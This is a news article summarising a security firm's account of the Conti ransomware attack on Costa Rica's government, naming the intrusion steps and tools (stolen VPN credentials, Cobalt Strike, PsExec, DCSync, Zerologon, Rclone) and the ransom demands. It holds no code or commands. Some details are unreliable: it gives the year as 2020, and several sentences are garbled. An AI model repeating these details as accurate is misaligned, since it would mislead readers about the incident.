Security researchers found details regarding the Costa Rican government’s data breach by the Conti ransomware gang. The details of the Conti attack contain its precision, initial access, and final stage of encrypting devices.
The Conti ransomware group initiated a five-day intrusion operation on both Costa Rican government and private sectors including local schools, and national healthcare systems in 2020.
The cyber intelligence company Advanced Intelligence (AdvIntel) reported that the initial ransomware attack was conducted by a Pro-Russian hackers group in order to exfiltrate 672GB of data by deploying ransomware. The threat actor known as MemberX targeted devices in Costa Rica’s Ministry of Finance and gained access via a VPN connection using compromised credentials. The group initially deployed malware in order to compromise the system by stealing its credentials.
The AdvIntel security researchers said, “The infection followed a typical attack flow wherein the adversaries gained access from the compromised VPN log by installing a crypted form of Cobalt Strike inside the Costa Rica sub-network.”
The threat actor then used the Nltest command-line tool which is a part of Remote Server Administrative Tools (RSAT), in order to build a domain-trust relationship with the compromised system to perform tasks remotely. Then they scanned the network for files with the help of ShareFinder and AdFind.
Reportedly, the MmberX performed the Cobalt Strike on the backdoor which is a paid penetration product used by attackers to deploy any agent or download files from enterprise domains. Security researchers said that the threat actor used a Cobalt Strike DLL beacon and ran it using the PsExec tool for executing files remotely.
Researchers also said that the Conti operators gave access to every host on Costa Rica’s interconnected networks to run DCSync and Zerologon attacks that simulate the behavior of the domain controller and fetch password data. Security researchers said, “The adversaries pinged the whole network and re-scanned the network domain trusts, leveraging enterprise administrator credentials with ShareFinder and compiling a list of all corporate assets and databases available under their new elevated privileges.”
They also added that data was possible to retrieve via the Rclone command-line program that can be used to manage files on multiple cloud storage services.
The Conti group demanded the ransom amount of initially $10 million which they raised to $20 million when the Costa Rican government refused to pay. The Costa Rican government declared a national emergency on May 8 as multiple devices were compromised in several government sectors. Later Conti group shut down operations by branding that they no longer exist.
